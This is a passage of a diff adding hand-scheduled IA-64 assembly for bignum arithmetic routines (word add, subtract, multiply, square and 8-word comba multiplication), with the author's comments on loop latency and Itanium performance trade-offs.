+{ .mib;	sub		r10=r35,r0,1
+	.save	ar.lc,r3
+	mov		r3=ar.lc
+	brp.loop.imp	.L_bn_add_words_ctop,.L_bn_add_words_cend-16
+					}
+{ .mib;	ADDP		r14=0,r32		// rp
+	.save	pr,r9
+	mov		r9=pr		};;
+	.body
+{ .mii;	ADDP		r15=0,r33		// ap
+	mov		ar.lc=r10
+	mov		ar.ec=6		}
+{ .mib;	ADDP		r16=0,r34		// bp
+	mov		pr.rot=1<<16	};;
+
+.L_bn_add_words_ctop:
+{ .mii;	(p16)	ld8		r32=[r16],8	  // b=*(bp++)
+	(p18)	add		r39=r37,r34
+	(p19)	cmp.ltu.unc	p56,p0=r40,r38	}
+{ .mfb;	(p0)	nop.m		0x0
+	(p0)	nop.f		0x0
+	(p0)	nop.b		0x0		}
+{ .mii;	(p16)	ld8		r35=[r15],8	  // a=*(ap++)
+	(p58)	cmp.eq.or	p57,p0=-1,r41	  // (p20)
+	(p58)	add		r41=1,r41	} // (p20)
+{ .mfb;	(p21)	st8		[r14]=r42,8	  // *(rp++)=r
+	(p0)	nop.f		0x0
+	br.ctop.sptk	.L_bn_add_words_ctop	};;
+.L_bn_add_words_cend:
+
+{ .mii;
+(p59)	add		r8=1,r8		// return value
+	mov		pr=r9,0x1ffff
+	mov		ar.lc=r3	}
+{ .mbb;	nop.b		0x0
+	br.ret.sptk.many	b0	};;
+.endp	bn_add_words#
+
+//
+// BN_ULONG bn_sub_words(BN_ULONG *rp, BN_ULONG *ap, BN_ULONG *bp,int num)
+//
+.global	bn_sub_words#
+.proc	bn_sub_words#
+.align	64
+.skip	32	// makes the loop body aligned at 64-byte boundary
+bn_sub_words:
+	.prologue
+	.save	ar.pfs,r2
+{ .mii;	alloc		r2=ar.pfs,4,12,0,16
+	cmp4.le		p6,p0=r35,r0	};;
+{ .mfb;	mov		r8=r0			// return value
+(p6)	br.ret.spnt.many	b0	};;
+
+{ .mib;	sub		r10=r35,r0,1
+	.save	ar.lc,r3
+	mov		r3=ar.lc
+	brp.loop.imp	.L_bn_sub_words_ctop,.L_bn_sub_words_cend-16
+					}
+{ .mib;	ADDP		r14=0,r32		// rp
+	.save	pr,r9
+	mov		r9=pr		};;
+	.body
+{ .mii;	ADDP		r15=0,r33		// ap
+	mov		ar.lc=r10
+	mov		ar.ec=6		}
+{ .mib;	ADDP		r16=0,r34		// bp
+	mov		pr.rot=1<<16	};;
+
+.L_bn_sub_words_ctop:
+{ .mii;	(p16)	ld8		r32=[r16],8	  // b=*(bp++)
+	(p18)	sub		r39=r37,r34
+	(p19)	cmp.gtu.unc	p56,p0=r40,r38	}
+{ .mfb;	(p0)	nop.m		0x0
+	(p0)	nop.f		0x0
+	(p0)	nop.b		0x0		}
+{ .mii;	(p16)	ld8		r35=[r15],8	  // a=*(ap++)
+	(p58)	cmp.eq.or	p57,p0=0,r41	  // (p20)
+	(p58)	add		r41=-1,r41	} // (p20)
+{ .mbb;	(p21)	st8		[r14]=r42,8	  // *(rp++)=r
+	(p0)	nop.b		0x0
+	br.ctop.sptk	.L_bn_sub_words_ctop	};;
+.L_bn_sub_words_cend:
+
+{ .mii;
+(p59)	add		r8=1,r8		// return value
+	mov		pr=r9,0x1ffff
+	mov		ar.lc=r3	}
+{ .mbb;	nop.b		0x0
+	br.ret.sptk.many	b0	};;
+.endp	bn_sub_words#
+#endif
+
+#if 0
+#define XMA_TEMPTATION
+#endif
+
+#if 1
+//
+// BN_ULONG bn_mul_words(BN_ULONG *rp, BN_ULONG *ap, int num, BN_ULONG w)
+//
+.global	bn_mul_words#
+.proc	bn_mul_words#
+.align	64
+.skip	32	// makes the loop body aligned at 64-byte boundary
+bn_mul_words:
+	.prologue
+	.save	ar.pfs,r2
+#ifdef XMA_TEMPTATION
+{ .mfi;	alloc		r2=ar.pfs,4,0,0,0	};;
+#else
+{ .mfi;	alloc		r2=ar.pfs,4,12,0,16	};;
+#endif
+{ .mib;	mov		r8=r0			// return value
+	cmp4.le		p6,p0=r34,r0
+(p6)	br.ret.spnt.many	b0		};;
+
+{ .mii;	sub	r10=r34,r0,1
+	.save	ar.lc,r3
+	mov	r3=ar.lc
+	.save	pr,r9
+	mov	r9=pr			};;
+
+	.body
+{ .mib;	setf.sig	f8=r35	// w
+	mov		pr.rot=0x800001<<16
+			// ------^----- serves as (p50) at first (p27)
+	brp.loop.imp	.L_bn_mul_words_ctop,.L_bn_mul_words_cend-16
+					}
+
+#ifndef XMA_TEMPTATION
+
+{ .mmi;	ADDP		r14=0,r32	// rp
+	ADDP		r15=0,r33	// ap
+	mov		ar.lc=r10	}
+{ .mmi;	mov		r40=0		// serves as r35 at first (p27)
+	mov		ar.ec=13	};;
+
+// This loop spins in 2*(n+12) ticks. It's scheduled for data in Itanium
+// L2 cache (i.e. 9 ticks away) as floating point load/store instructions
+// bypass L1 cache and L2 latency is actually best-case scenario for
+// ldf8. The loop is not scalable and shall run in 2*(n+12) even on
+// "wider" IA-64 implementations. It's a trade-off here. n+24 loop
+// would give us ~5% in *overall* performance improvement on "wider"
+// IA-64, but would hurt Itanium for about same because of longer
+// epilogue. As it's a matter of few percents in either case I've
+// chosen to trade the scalability for development time (you can see
+// this very instruction sequence in bn_mul_add_words loop which in
+// turn is scalable).
+.L_bn_mul_words_ctop:
+{ .mfi;	(p25)	getf.sig	r36=f52			// low
+	(p21)	xmpy.lu		f48=f37,f8
+	(p28)	cmp.ltu		p54,p50=r41,r39	}
+{ .mfi;	(p16)	ldf8		f32=[r15],8
+	(p21)	xmpy.hu		f40=f37,f8
+	(p0)	nop.i		0x0		};;
+{ .mii;	(p25)	getf.sig	r32=f44			// high
+	.pred.rel	"mutex",p50,p54
+	(p50)	add		r40=r38,r35		// (p27)
+	(p54)	add		r40=r38,r35,1	}	// (p27)
+{ .mfb;	(p28)	st8		[r14]=r41,8
+	(p0)	nop.f		0x0
+	br.ctop.sptk	.L_bn_mul_words_ctop	};;
+.L_bn_mul_words_cend:
+
+{ .mii;	nop.m		0x0
+.pred.rel	"mutex",p51,p55
+(p51)	add		r8=r36,r0
+(p55)	add		r8=r36,r0,1	}
+{ .mfb;	nop.m	0x0
+	nop.f	0x0
+	nop.b	0x0			}
+
+#else	// XMA_TEMPTATION
+
+	setf.sig	f37=r0	// serves as carry at (p18) tick
+	mov		ar.lc=r10
+	mov		ar.ec=5;;
+
+// Most of you examining this code very likely wonder why in the name
+// of Intel the following loop is commented out? Indeed, it looks so
+// neat that you find it hard to believe that it's something wrong
+// with it, right? The catch is that every iteration depends on the
+// result from previous one and the latter isn't available instantly.
+// The loop therefore spins at the latency of xma minus 1, or in other
+// words at 6*(n+4) ticks:-( Compare to the "production" loop above
+// that runs in 2*(n+11) where the low latency problem is worked around
+// by moving the dependency to one-tick latent interger ALU. Note that
+// "distance" between ldf8 and xma is not latency of ldf8, but the
+// *difference* between xma and ldf8 latencies.
+.L_bn_mul_words_ctop:
+{ .mfi;	(p16)	ldf8		f32=[r33],8
+	(p18)	xma.hu		f38=f34,f8,f39	}
+{ .mfb;	(p20)	stf8		[r32]=f37,8
+	(p18)	xma.lu		f35=f34,f8,f39
+	br.ctop.sptk	.L_bn_mul_words_ctop	};;
+.L_bn_mul_words_cend:
+
+	getf.sig	r8=f41		// the return value
+
+#endif	// XMA_TEMPTATION
+
+{ .mii;	nop.m		0x0
+	mov		pr=r9,0x1ffff
+	mov		ar.lc=r3	}
+{ .mfb;	rum		1<<5		// clear um.mfh
+	nop.f		0x0
+	br.ret.sptk.many	b0	};;
+.endp	bn_mul_words#
+#endif
+
+#if 1
+//
+// BN_ULONG bn_mul_add_words(BN_ULONG *rp, BN_ULONG *ap, int num, BN_ULONG w)
+//
+.global	bn_mul_add_words#
+.proc	bn_mul_add_words#
+.align	64
+.skip	48	// makes the loop body aligned at 64-byte boundary
+bn_mul_add_words:
+	.prologue
+	.save	ar.pfs,r2
+{ .mmi;	alloc		r2=ar.pfs,4,4,0,8
+	cmp4.le		p6,p0=r34,r0
+	.save	ar.lc,r3
+	mov		r3=ar.lc	};;
+{ .mib;	mov		r8=r0		// return value
+	sub		r10=r34,r0,1
+(p6)	br.ret.spnt.many	b0	};;
+
+{ .mib;	setf.sig	f8=r35		// w
+	.save	pr,r9
+	mov		r9=pr
+	brp.loop.imp	.L_bn_mul_add_words_ctop,.L_bn_mul_add_words_cend-16
+					}
+	.body
+{ .mmi;	ADDP		r14=0,r32	// rp
+	ADDP		r15=0,r33	// ap
+	mov		ar.lc=r10	}
+{ .mii;	ADDP		r16=0,r32	// rp copy
+	mov		pr.rot=0x2001<<16
+			// ------^----- serves as (p40) at first (p27)
+	mov		ar.ec=11	};;
+
+// This loop spins in 3*(n+10) ticks on Itanium and in 2*(n+10) on
+// Itanium 2. Yes, unlike previous versions it scales:-) Previous
+// version was peforming *all* additions in IALU and was starving
+// for those even on Itanium 2. In this version one addition is
+// moved to FPU and is folded with multiplication. This is at cost
+// of propogating the result from previous call to this subroutine
+// to L2 cache... In other words negligible even for shorter keys.
+// *Overall* performance improvement [over previous version] varies
+// from 11 to 22 percent depending on key length.
+.L_bn_mul_add_words_ctop:
+.pred.rel	"mutex",p40,p42
+{ .mfi;	(p23)	getf.sig	r36=f45			// low
+	(p20)	xma.lu		f42=f36,f8,f50		// low
+	(p40)	add		r39=r39,r35	}	// (p27)
+{ .mfi;	(p16)	ldf8		f32=[r15],8		// *(ap++)
+	(p20)	xma.hu		f36=f36,f8,f50		// high
+	(p42)	add		r39=r39,r35,1	};;	// (p27)
+{ .mmi;	(p24)	getf.sig	r32=f40			// high
+	(p16)	ldf8		f46=[r16],8		// *(rp1++)
+	(p40)	cmp.ltu		p41,p39=r39,r35	}	// (p27)
+{ .mib;	(p26)	st8		[r14]=r39,8		// *(rp2++)
+	(p42)	cmp.leu		p41,p39=r39,r35		// (p27)
+	br.ctop.sptk	.L_bn_mul_add_words_ctop};;
+.L_bn_mul_add_words_cend:
+
+{ .mmi;	.pred.rel	"mutex",p40,p42
+(p40)	add		r8=r35,r0
+(p42)	add		r8=r35,r0,1
+	mov		pr=r9,0x1ffff	}
+{ .mib;	rum		1<<5		// clear um.mfh
+	mov		ar.lc=r3
+	br.ret.sptk.many	b0	};;
+.endp	bn_mul_add_words#
+#endif
+
+#if 1
+//
+// void bn_sqr_words(BN_ULONG *rp, BN_ULONG *ap, int num)
+//
+.global	bn_sqr_words#
+.proc	bn_sqr_words#
+.align	64
+.skip	32	// makes the loop body aligned at 64-byte boundary 
+bn_sqr_words:
+	.prologue
+	.save	ar.pfs,r2
+{ .mii;	alloc		r2=ar.pfs,3,0,0,0
+	sxt4		r34=r34		};;
+{ .mii;	cmp.le		p6,p0=r34,r0
+	mov		r8=r0		}	// return value
+{ .mfb;	ADDP		r32=0,r32
+	nop.f		0x0
+(p6)	br.ret.spnt.many	b0	};;
+
+{ .mii;	sub	r10=r34,r0,1
+	.save	ar.lc,r3
+	mov	r3=ar.lc
+	.save	pr,r9
+	mov	r9=pr			};;
+
+	.body
+{ .mib;	ADDP		r33=0,r33
+	mov		pr.rot=1<<16
+	brp.loop.imp	.L_bn_sqr_words_ctop,.L_bn_sqr_words_cend-16
+					}
+{ .mii;	add		r34=8,r32
+	mov		ar.lc=r10
+	mov		ar.ec=18	};;
+
+// 2*(n+17) on Itanium, (n+17) on "wider" IA-64 implementations. It's
+// possible to compress the epilogue (I'm getting tired to write this
+// comment over and over) and get down to 2*n+16 at the cost of
+// scalability. The decision will very likely be reconsidered after the
+// benchmark program is profiled. I.e. if perfomance gain on Itanium
+// will appear larger than loss on "wider" IA-64, then the loop should
+// be explicitely split and the epilogue compressed.
+.L_bn_sqr_words_ctop:
+{ .mfi;	(p16)	ldf8		f32=[r33],8
+	(p25)	xmpy.lu		f42=f41,f41
+	(p0)	nop.i		0x0		}
+{ .mib;	(p33)	stf8		[r32]=f50,16
+	(p0)	nop.i		0x0
+	(p0)	nop.b		0x0		}
+{ .mfi;	(p0)	nop.m		0x0
+	(p25)	xmpy.hu		f52=f41,f41
+	(p0)	nop.i		0x0		}
+{ .mib;	(p33)	stf8		[r34]=f60,16
+	(p0)	nop.i		0x0
+	br.ctop.sptk	.L_bn_sqr_words_ctop	};;
+.L_bn_sqr_words_cend:
+
+{ .mii;	nop.m		0x0
+	mov		pr=r9,0x1ffff
+	mov		ar.lc=r3	}
+{ .mfb;	rum		1<<5		// clear um.mfh
+	nop.f		0x0
+	br.ret.sptk.many	b0	};;
+.endp	bn_sqr_words#
+#endif
+
+#if 1
+// Apparently we win nothing by implementing special bn_sqr_comba8.
+// Yes, it is possible to reduce the number of multiplications by
+// almost factor of two, but then the amount of additions would
+// increase by factor of two (as we would have to perform those
+// otherwise performed by xma ourselves). Normally we would trade
+// anyway as multiplications are way more expensive, but not this
+// time... Multiplication kernel is fully pipelined and as we drain
+// one 128-bit multiplication result per clock cycle multiplications
+// are effectively as inexpensive as additions. Special implementation
+// might become of interest for "wider" IA-64 implementation as you'll
+// be able to get through the multiplication phase faster (there won't
+// be any stall issues as discussed in the commentary section below and
+// you therefore will be able to employ all 4 FP units)... But these
+// Itanium days it's simply too hard to justify the effort so I just
+// drop down to bn_mul_comba8 code:-)
+//
+// void bn_sqr_comba8(BN_ULONG *r, BN_ULONG *a)
+//
+.global	bn_sqr_comba8#
+.proc	bn_sqr_comba8#
+.align	64
+bn_sqr_comba8:
+	.prologue
+	.save	ar.pfs,r2
+#if defined(_HPUX_SOURCE) && !defined(_LP64)
+{ .mii;	alloc	r2=ar.pfs,2,1,0,0
+	addp4	r33=0,r33
+	addp4	r32=0,r32		};;
+{ .mii;
+#else
+{ .mii;	alloc	r2=ar.pfs,2,1,0,0
+#endif
+	mov	r34=r33
+	add	r14=8,r33		};;
+	.body
+{ .mii;	add	r17=8,r34
+	add	r15=16,r33
+	add	r18=16,r34		}
+{ .mfb;	add	r16=24,r33
+	br	.L_cheat_entry_point8	};;
+.endp	bn_sqr_comba8#
+#endif
+
+#if 1
+// I've estimated this routine to run in ~120 ticks, but in reality
+// (i.e. according to ar.itc) it takes ~160 ticks. Are those extra
+// cycles consumed for instructions fetch? Or did I misinterpret some
+// clause in Itanium µ-architecture manual? Comments are welcomed and
+// highly appreciated.
+//
+// On Itanium 2 it takes ~190 ticks. This is because of stalls on
+// result from getf.sig. I do nothing about it at this point for
+// reasons depicted below.
+//
+// However! It should be noted that even 160 ticks is darn good result
+// as it's over 10 (yes, ten, spelled as t-e-n) times faster than the
+// C version (compiled with gcc with inline assembler). I really
+// kicked compiler's butt here, didn't I? Yeah! This brings us to the
+// following statement. It's damn shame that this routine isn't called
+// very often nowadays! According to the profiler most CPU time is
+// consumed by bn_mul_add_words called from BN_from_montgomery. In
+// order to estimate what we're missing, I've compared the performance
+// of this routine against "traditional" implementation, i.e. against
+// following routine:
+//
+// void bn_mul_comba8(BN_ULONG *r, BN_ULONG *a, BN_ULONG *b)
+// {	r[ 8]=bn_mul_words(    &(r[0]),a,8,b[0]);
+//	r[ 9]=bn_mul_add_words(&(r[1]),a,8,b[1]);
+//	r[10]=bn_mul_add_words(&(r[2]),a,8,b[2]);
+//	r[11]=bn_mul_add_words(&(r[3]),a,8,b[3]);
+//	r[12]=bn_mul_add_words(&(r[4]),a,8,b[4]);
+//	r[13]=bn_mul_add_words(&(r[5]),a,8,b[5]);
+//	r[14]=bn_mul_add_words(&(r[6]),a,8,b[6]);
+//	r[15]=bn_mul_add_words(&(r[7]),a,8,b[7]);
+// }
+//
+// The one below is over 8 times faster than the one above:-( Even
+// more reasons to "combafy" bn_mul_add_mont...
+//
+// And yes, this routine really made me wish there were an optimizing
+// assembler! It also feels like it deserves a dedication.
+//
+//	To my wife for being there and to my kids...
+//
+// void bn_mul_comba8(BN_ULONG *r, BN_ULONG *a, BN_ULONG *b)
+//
+#define	carry1	r14
+#define	carry2	r15
+#define	carry3	r34
+.global	bn_mul_comba8#
+.proc	bn_mul_comba8#
+.align	64
+bn_mul_comba8:
+	.prologue
+	.save	ar.pfs,r2
+#if defined(_HPUX_SOURCE) && !defined(_LP64)
+{ .mii;	alloc	r2=ar.pfs,3,0,0,0
+	addp4	r33=0,r33
+	addp4	r34=0,r34		};;
+{ .mii;	addp4	r32=0,r32
+#else
+{ .mii;	alloc   r2=ar.pfs,3,0,0,0
+#endif
+	add	r14=8,r33
+	add	r17=8,r34		}
+	.body
+{ .mii;	add	r15=16,r33
+	add	r18=16,r34
+	add	r16=24,r33		}
+.L_cheat_entry_point8:
+{ .mmi;	add	r19=24,r34
+
+	ldf8	f32=[r33],32		};;
+
+{ .mmi;	ldf8	f120=[r34],32
+	ldf8	f121=[r17],32		}
+{ .mmi;	ldf8	f122=[r18],32
+	ldf8	f123=[r19],32		};;
+{ .mmi;	ldf8	f124=[r34]
+	ldf8	f125=[r17]		}
+{ .mmi;	ldf8	f126=[r18]
+	ldf8	f127=[r19]		}
+
+{ .mmi;	ldf8	f33=[r14],32
+	ldf8	f34=[r15],32		}
+{ .mmi;	ldf8	f35=[r16],32;;
+	ldf8	f36=[r33]		}
+{ .mmi;	ldf8	f37=[r14]
+	ldf8	f38=[r15]		}
+{ .mfi;	ldf8	f39=[r16]
+// -------\ Entering multiplier's heaven /-------
+// ------------\                    /------------
+// -----------------\          /-----------------
+// ----------------------\/----------------------
+		xma.hu	f41=f32,f120,f0		}
+{ .mfi;		xma.lu	f40=f32,f120,f0		};; // (*)
+{ .mfi;		xma.hu	f51=f32,f121,f0		}
+{ .mfi;		xma.lu	f50=f32,f121,f0		};;
+{ .mfi;		xma.hu	f61=f32,f122,f0		}
+{ .mfi;		xma.lu	f60=f32,f122,f0		};;
+{ .mfi;		xma.hu	f71=f32,f123,f0		}
+{ .mfi;		xma.lu	f70=f32,f123,f0		};;
+{ .mfi;		xma.hu	f81=f32,f124,f0		}
+{ .mfi;		xma.lu	f80=f32,f124,f0		};;
+{ .mfi;		xma.hu	f91=f32,f125,f0		}
+{ .mfi;		xma.lu	f90=f32,f125,f0		};;
+{ .mfi;		xma.hu	f101=f32,f126,f0	}
+{ .mfi;		xma.lu	f100=f32,f126,f0	};;
+{ .mfi;		xma.hu	f111=f32,f127,f0	}
+{ .mfi;		xma.lu	f110=f32,f127,f0	};;//
+// (*)	You can argue that splitting at every second bundle would
+//	prevent "wider" IA-64 implementations from achieving the peak
+//	performance. Well, not really... The catch is that if you
+//	intend to keep 4 FP units busy by splitting at every fourth
+//	bundle and thus perform these 16 multiplications in 4 ticks,
+//	the first bundle *below* would stall because the result from
+//	the first xma bundle *above* won't be available for another 3
+//	ticks (if not more, being an optimist, I assume that "wider"
+//	implementation will have same latency:-). This stall will hold
+//	you back and the performance would be as if every second bundle
+//	were split *anyway*...
+{ .mfi;	getf.sig	r16=f40
+		xma.hu	f42=f33,f120,f41
+	add		r33=8,r32		}
+{ .mfi;		xma.lu	f41=f33,f120,f41	};;
+{ .mfi;	getf.sig	r24=f50
+		xma.hu	f52=f33,f121,f51	}
+{ .mfi;		xma.lu	f51=f33,f121,f51	};;
+{ .mfi;	st8		[r32]=r16,16
+		xma.hu	f62=f33,f122,f61	}
+{ .mfi;		xma.lu	f61=f33,f122,f61	};;
+{ .mfi;		xma.hu	f72=f33,f123,f71	}
+{ .mfi;		xma.lu	f71=f33,f123,f71	};;
+{ .mfi;		xma.hu	f82=f33,f124,f81	}
+{ .mfi;		xma.lu	f81=f33,f124,f81	};;
+{ .mfi;		xma.hu	f92=f33,f125,f91	}
+{ .mfi;		xma.lu	f91=f33,f125,f91	};;
+{ .mfi;		xma.hu	f102=f33,f126,f101	}
+{ .mfi;		xma.lu	f101=f33,f126,f101	};;
+{ .mfi;		xma.hu	f112=f33,f127,f111	}
+{ .mfi;		xma.lu	f111=f33,f127,f111	};;//
+//-------------------------------------------------//
+{ .mfi;	getf.sig	r25=f41
+		xma.hu	f43=f34,f120,f42	}
+{ .mfi;		xma.lu	f42=f34,f120,f42	};;
+{ .mfi;	getf.sig	r16=f60
+		xma.hu	f53=f34,f121,f52	}
+{ .mfi;		xma.lu	f52=f34,f121,f52	};;
+{ .mfi;	getf.sig	r17=f51
+		xma.hu	f63=f34,f122,f62
+	add		r25=r25,r24		}
+{ .mfi;		xma.lu	f62=f34,f122,f62
+	mov		carry1=0		};;
+{ .mfi;	cmp.ltu		p6,p0=r25,r24
+		xma.hu	f73=f34,f123,f72	}
+{ .mfi;		xma.lu	f72=f34,f123,f72	};;
+{ .mfi;	st8		[r33]=r25,16
+		xma.hu	f83=f34,f124,f82
+(p6)	add		carry1=1,carry1		}
+{ .mfi;		xma.lu	f82=f34,f124,f82	};;
+{ .mfi;		xma.hu	f93=f34,f125,f92	}
+{ .mfi;		xma.lu	f92=f34,f125,f92	};;
+{ .mfi;		xma.hu	f103=f34,f126,f102	}
+{ .mfi;		xma.lu	f102=f34,f126,f102	};;
+{ .mfi;		xma.hu	f113=f34,f127,f112	}
+{ .mfi;		xma.lu	f112=f34,f127,f112	};;//
+//-------------------------------------------------//
+{ .mfi;	getf.sig	r18=f42
+		xma.hu	f44=f35,f120,f43
+	add		r17=r17,r16		}
+{ .mfi;		xma.lu	f43=f35,f120,f43	};;
+{ .mfi;	getf.sig	r24=f70
+		xma.hu	f54=f35,f121,f53	}
+{ .mfi;	mov		carry2=0
+		xma.lu	f53=f35,f121,f53	};;
+{ .mfi;	getf.sig	r25=f61
+		xma.hu	f64=f35,f122,f63
+	cmp.ltu		p7,p0=r17,r16		}
+{ .mfi;	add		r18=r18,r17
+		xma.lu	f63=f35,f122,f63	};;
+{ .mfi;	getf.sig	r26=f52
+		xma.hu	f74=f35,f123,f73
+(p7)	add		carry2=1,carry2		}
+{ .mfi;	cmp.ltu		p7,p0=r18,r17
+		xma.lu	f73=f35,f123,f73
+	add		r18=r18,carry1		};;
+{ .mfi;
+		xma.hu	f84=f35,f124,f83
+(p7)	add		carry2=1,carry2		}
+{ .mfi;	cmp.ltu		p7,p0=r18,carry1
+		xma.lu	f83=f35,f124,f83	};;
+{ .mfi;	st8		[r32]=r18,16
+		xma.hu	f94=f35,f125,f93
+(p7)	add		carry2=1,carry2		}
+{ .mfi;		xma.lu	f93=f35,f125,f93	};;
+{ .mfi;		xma.hu	f104=f35,f126,f103	}
+{ .mfi;		xma.lu	f103=f35,f126,f103	};;
+{ .mfi;		xma.hu	f114=f35,f127,f113	}
+{ .mfi;	mov		carry1=0
+		xma.lu	f113=f35,f127,f113
+	add		r25=r25,r24		};;//
+//-------------------------------------------------//
+{ .mfi;	getf.sig	r27=f43
+		xma.hu	f45=f36,f120,f44
+	cmp.ltu		p6,p0=r25,r24		}
+{ .mfi;		xma.lu	f44=f36,f120,f44	
+	add		r26=r26,r25		};;
+{ .mfi;	getf.sig	r16=f80
+		xma.hu	f55=f36,f121,f54
+(p6)	add		carry1=1,carry1		}
+{ .mfi;		xma.lu	f54=f36,f121,f54	};;
+{ .mfi;	getf.sig	r17=f71
+		xma.hu	f65=f36,f122,f64
+	cmp.ltu		p6,p0=r26,r25		}
+{ .mfi;		xma.lu	f64=f36,f122,f64
+	add		r27=r27,r26		};;
+{ .mfi;	getf.sig	r18=f62
+		xma.hu	f75=f36,f123,f74
+(p6)	add		carry1=1,carry1		}
+{ .mfi;	cmp.ltu		p6,p0=r27,r26
+		xma.lu	f74=f36,f123,f74
+	add		r27=r27,carry2		};;
+{ .mfi;	getf.sig	r19=f53
+		xma.hu	f85=f36,f124,f84
+(p6)	add		carry1=1,carry1		}
+{ .mfi;		xma.lu	f84=f36,f124,f84
+	cmp.ltu		p6,p0=r27,carry2	};;
+{ .mfi;	st8		[r33]=r27,16
+		xma.hu	f95=f36,f125,f94
+(p6)	add		carry1=1,carry1		}
+{ .mfi;		xma.lu	f94=f36,f125,f94	};;
+{ .mfi;		xma.hu	f105=f36,f126,f104	}
+{ .mfi;	mov		carry2=0
+		xma.lu	f104=f36,f126,f104
+	add		r17=r17,r16		};;
+{ .mfi;		xma.hu	f115=f36,f127,f114
+	cmp.ltu		p7,p0=r17,r16		}
+{ .mfi;		xma.lu	f114=f36,f127,f114
+	add		r18=r18,r17		};;//
+//-------------------------------------------------//
+{ .mfi;	getf.sig	r20=f44
+		xma.hu	f46=f37,f120,f45
+(p7)	add		carry2=1,carry2		}
+{ .mfi;	cmp.ltu		p7,p0=r18,r17
+		xma.lu	f45=f37,f120,f45
+	add		r19=r19,r18		};;
+{ .mfi;	getf.sig	r24=f90
+		xma.hu	f56=f37,f121,f55	}
+{ .mfi;		xma.lu	f55=f37,f121,f55	};;
+{ .mfi;	getf.sig	r25=f81
+		xma.hu	f66=f37,f122,f65
+(p7)	add		carry2=1,carry2		}
+{ .mfi;	cmp.ltu		p7,p0=r19,r18
+		xma.lu	f65=f37,f122,f65
+	add		r20=r20,r19		};;
+{ .mfi;	getf.sig	r26=f72
+		xma.hu	f76=f37,f123,f75
+(p7)	add		carry2=1,carry2		}
+{ .mfi;	cmp.ltu		p7,p0=r20,r19
+		xma.lu	f75=f37,f123,f75
+	add		r20=r20,carry1		};;
+{ .mfi;	getf.sig	r27=f63
+		xma.hu	f86=f37,f124,f85
+(p7)	add		carry2=1,carry2		}
+{ .mfi;		xma.lu	f85=f37,f124,f85
+	cmp.ltu		p7,p0=r20,carry1	};;
+{ .mfi;	getf.sig	r28=f54
+		xma.hu	f96=f37,f125,f95
+(p7)	add		carry2=1,carry2		}
+{ .mfi;	st8		[r32]=r20,16
+		xma.lu	f95=f37,f125,f95	};;
+{ .mfi;		xma.hu	f106=f37,f126,f105	}
+{ .mfi;	mov		carry1=0
+		xma.lu	f105=f37,f126,f105
+	add		r25=r25,r24		};;
+{ .mfi;		xma.hu	f116=f37,f127,f115
+	cmp.ltu		p6,p0=r25,r24		}
+{ .mfi;		xma.lu	f115=f37,f127,f115
+	add		r26=r26,r25		};;//
+//-------------------------------------------------//
+{ .mfi;	getf.sig	r29=f45
+		xma.hu	f47=f38,f120,f46
+(p6)	add		carry1=1,carry1		}
+{ .mfi;	cmp.ltu		p6,p0=r26,r25
+		xma.lu	f46=f38,f120,f46
+	add		r27=r27,r26		};;
+{ .mfi;	getf.sig	r16=f100
+		xma.hu	f57=f38,f121,f56
+(p6)	add		carry1=1,carry1		}
+{ .mfi;	cmp.ltu		p6,p0=r27,r26
+		xma.lu	f56=f38,f121,f56
+	add		r28=r28,r27		};;
+{ .mfi;	getf.sig	r17=f91
+		xma.hu	f67=f38,f122,f66
+(p6)	add		carry1=1,carry1		}
+{ .mfi;	cmp.ltu		p6,p0=r28,r27
+		xma.lu	f66=f38,f122,f66
+	add		r29=r29,r28		};;
+{ .mfi;	getf.sig	r18=f82
+		xma.hu	f77=f38,f123,f76
+(p6)	add		carry1=1,carry1		}
+{ .mfi;	cmp.ltu		p6,p0=r29,r28
+		xma.lu	f76=f38,f123,f76
+	add		r29=r29,carry2		};;
+{ .mfi;	getf.sig	r19=f73
+		xma.hu	f87=f38,f124,f86
+(p6)	add		carry1=1,carry1		}
+{ .mfi;		xma.lu	f86=f38,f124,f86
+	cmp.ltu		p6,p0=r29,carry2	};;
+{ .mfi;	getf.sig	r20=f64
+		xma.hu	f97=f38,f125,f96
+(p6)	add		carry1=1,carry1		}
+{ .mfi;	st8		[r33]=r29,16
+		xma.lu	f96=f38,f125,f96	};;
+{ .mfi;	getf.sig	r21=f55
+		xma.hu	f107=f38,f126,f106	}
+{ .mfi;	mov		carry2=0
+		xma.lu	f106=f38,f126,f106
+	add		r17=r17,r16		};;
+{ .mfi;		xma.hu	f117=f38,f127,f116
+	cmp.ltu		p7,p0=r17,r16		}
+{ .mfi;		xma.lu	f116=f38,f127,f116
+	add		r18=r18,r17		};;//
+//-------------------------------------------------//
+{ .mfi;	getf.sig	r22=f46
+		xma.hu	f48=f39,f120,f47
+(p7)	add		carry2=1,carry2		}
+{ .mfi;	cmp.ltu		p7,p0=r18,r17
+		xma.lu	f47=f39,f120,f47
+	add		r19=r19,r18		};;
+{ .mfi;	getf.sig	r24=f110
+		xma.hu	f58=f39,f121,f57
+(p7)	add		carry2=1,carry2		}
+{ .mfi;	cmp.ltu		p7,p0=r19,r18
+		xma.lu	f57=f39,f121,f57
+	add		r20=r20,r19		};;
+{ .mfi;	getf.sig	r25=f101
+		xma.hu	f68=f39,f122,f67
+(p7)	add		carry2=1,carry2		}
+{ .mfi;	cmp.ltu		p7,p0=r20,r19
+		xma.lu	f67=f39,f122,f67
+	add		r21=r21,r20		};;
+{ .mfi;	getf.sig	r26=f92
+		xma.hu	f78=f39,f123,f77
+(p7)	add		carry2=1,carry2		}
+{ .mfi;	cmp.ltu		p7,p0=r21,r20
+		xma.lu	f77=f39,f123,f77
+	add		r22=r22,r21		};;
+{ .mfi;	getf.sig	r27=f83
+		xma.hu	f88=f39,f124,f87
+(p7)	add		carry2=1,carry2		}
+{ .mfi;	cmp.ltu		p7,p0=r22,r21
+		xma.lu	f87=f39,f124,f87
+	add		r22=r22,carry1		};;
+{ .mfi;	getf.sig	r28=f74
+		xma.hu	f98=f39,f125,f97
+(p7)	add		carry2=1,carry2		}
+{ .mfi;		xma.lu	f97=f39,f125,f97
+	cmp.ltu		p7,p0=r22,carry1	};;
+{ .mfi;	getf.sig	r29=f65
+		xma.hu	f108=f39,f126,f107
+(p7)	add		carry2=1,carry2		}
+{ .mfi;	st8		[r32]=r22,16
+		xma.lu	f107=f39,f126,f107	};;
+{ .mfi;	getf.sig	r30=f56
+		xma.hu	f118=f39,f127,f117	}
+{ .mfi;		xma.lu	f117=f39,f127,f117	};;//
+//-------------------------------------------------//
+// Leaving muliplier's heaven... Quite a ride, huh?
+
+{ .mii;	getf.sig	r31=f47
+	add		r25=r25,r24
+	mov		carry1=0		};;
+{ .mii;		getf.sig	r16=f111
